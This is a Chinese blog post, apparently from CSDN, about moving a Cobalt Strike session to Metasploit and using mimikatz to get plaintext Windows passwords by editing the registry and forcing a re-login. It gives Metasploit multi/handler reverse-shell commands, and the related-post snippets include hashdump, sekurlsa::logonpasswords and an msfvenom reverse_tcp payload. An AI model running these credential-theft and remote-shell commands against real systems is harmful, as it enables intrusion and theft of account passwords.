cs与msf权限传递,以及mimikatz抓取win2012明文密码

于 2024-05-28 16:03:36 发布
阅读量224 收藏 3
点赞数 8
文章标签: 明文
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63750160/article/details/139269763
版权

一、mimikatz抓取windows明文密码
我这里用的是window2016测试

假设我已经获取到了一台windows的权限

抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
 

cs->msf

创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行新建会话选择监听器

 msf进去选择监听模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)
set lhost 0.0.0.0(不设置也行)
set lport 4444
exploit
 

万能小硕
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF中获取用户密码
谢公子的博客
04-28 4542
获取用户密码 抓取自动登录的密码 1:很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin 抓取自动登录的用户名和密码 导出密码哈希 2:hashdump 模块可以从SAM数据库中导出本地用户账号,执行:runhashdump ,该命令的使用需要系统权限 还可以使用命令:run wi...
MSF后渗透之获取windows登录密码
最新发布
qq_55364369的博客
09-05 2701
MSF后渗透之获取windows登录密码
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6812
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
MSF抓取密码
qq_42383069的博客
03-24 1851
MSF抓取密码 导出密码哈希 run hashdump命令   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限 在meterpreter_shell中执行run hashdump命令 命令: run hashdump 用户哈希数据的输出格式为: 用户名:SID:LM哈希:NTLM哈希::: 3. run windows/gather/smart_hashdump命令   run windows/gather/smart_hashdump命令的使用需要系统权限。该
获取目标Windows密码方式总结
Kevin's Blog
11-10 1274
文章目录一、目的/需求二、MSFmimikatz模块获取密码2.1 模块介绍2.2 前提条件2.3 操作方法2.3.1 权限提升(略)2.3.2 进程迁移2.3.3 获取哈希2.2.4 获取密码三、MSF的kiwi模块获取密码3.1 模块介绍3.2 操作方法3.2.1 获取密码 一、目的/需求   拿到victim的控制权限,需要远程登录victim的主机,这时需要获取对方的登录密码。 二、MSFmimikatz模块获取密码 2.1 模块介绍 1. 介绍:   Mimikatz由法国人开发的轻量级调试工
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,通过Web传递的方式获取靶机权限。以下是详细的知识点解析: 1. **Metasploit框架**:Metasploit是一款开源的安全漏洞检测工具,它包含了大量的漏洞...
通信与网络中的MSF基于组件的业务框架
11-14
MSF业务框架的目标是通过明确的接口定义,促进组件间以及组件与代理之间的松耦合,从而提高业务的可维护性和可扩展性。这种架构允许开发人员专注于单个组件的功能,同时确保整体业务流程的顺畅。此外,通过解耦,...
基础电子中的MSF业务框架与IMS的关系
11-14
MSF(Method for System Specification and Development,系统规范与开发方法)是一种在电信行业中广泛采用的业务框架,它旨在提供一个高效、结构化的开发过程,以适应不断变化的市场需求和技术创新。MSF的核心是...
Msf攻击Win7
07-09
总的来说,Msf攻击Win7涉及到的信息安全实践包括:漏洞扫描(使用Nessus)、漏洞利用(使用Metasploit)以及对目标系统的远程控制。在整个过程中,安全测试者必须遵守合法授权和道德规范,仅用于合法的测试目的。
通信与网络中的MSF250的DS1/E1信号格式
12-10
MSF250是一种多业务成帧芯片,其主要功能在于处理通信网络中的DS1/E1信号格式。DS1(T1)和E1(欧洲的T1版本)是数字语音和数据通信的标准,通常用于将多个较低速率的信号(如DS0,每个24kbps)复用成更高速率的链路...
Metasploit中使用Mimikatz抓取内存中的Windows密码
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-24 1621
我是通过这个漏洞学习内存抓取Windows密码的 首先你需要提升Shell权限为System 加载mimikatz模块 load mimikatz 三种获取密码方法 一、可以抓取到当前所有登录用户的明文密码(推荐使用) kerberos 二、只可显示HASH(显示所有用户密码HASH) mimikatz_command -f samdump::hashes 三、只能显示当前登录的用户加密后的密码 ...
meterpreter下抓取windows系统明文密码实验
Feng_Blue_的博客
11-04 4646
虚拟机:kali | Win7 工具:msf 1.生成工具 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.40.140 lport=55555 -f exe -o 233.exe 这里需要注意的是IP地址以及端口。 2.监听 启动msf,选择模块,配置信息,监听。 msf6 > use exploit/multi/handler set payload windows/x64/met...
关于Windows系列密码抓取
weixin_30790841的博客
03-31 396
首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络) 首先介绍一下windows密码Hash: 早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解。微软提出了WindowsNT挑战/响应验证机制,称之为NTLM。现在已经有了更新的...
Web渗透小案例——利用MSF拿下phpmyadmin的windows服务器system权限读取管理员密码
Mr_Wanderer的博客
08-08 2154
文章目录配置靶机新建低权限用户安装phpstudy为phpstudy相关服务分配权限设置mysql权限设置Apache权限设置apache和MySQLa服务更换phpmyadmin版本漏洞原理使用MSF进行漏洞利用打开msf爆破靶机密码利用phpmyadmin漏洞进行攻击建立稳定连接生成反向连接木马攻击机开启端口监听,等待靶机连接攻击机上传木马并运行提权获取管理员账号和密码加载mimikatz迁移进程写在最后亲测可行。如果本文有帮到您,求点赞留言~如果有任何疑问,请私信我 配置靶机 靶机操作系统选择wind
11--使用 mimikatz 提取 windows凭据的密码
热门推荐
SunShine
06-28 4万+
mimikatz一.mimikatz简介  是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://...
meterpreter中使用mimikatz获取windows密码
浅笑996的博客
07-01 4174
进去meterpreter后getuid一下 这获得系统管理员权限 开始 加载mimikatz模块 load mimikatz 加载成功. 第一种方法: 获取登录密码的hash值 msv 上面已经是得到hash值了. 下面算明文密码. 获取明文密码 kerberos look...拿到登录的明文密码了. 第二种方法: 使用另一种方式获取哈希值 mimikatz_command -f samdump::hashes 根据上面的方式获取明文密码 ...
渗透实战之破解windows登录密码
myweaven的专栏
04-12 3619
已经获得metepretershell了,利用里面的hashdump功能导出加密过的密钥。尝试直接上传mimikatz破解密钥:     首先输入命令:privilege::debug     接着输入命令:sekurlsa::logonpasswords总是失败,发现是由于目标上装有安全软件。mimikatz被杀了。这里换一种思路,用微软的prodump软件导出密钥,然后下载到本地,再用mimi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值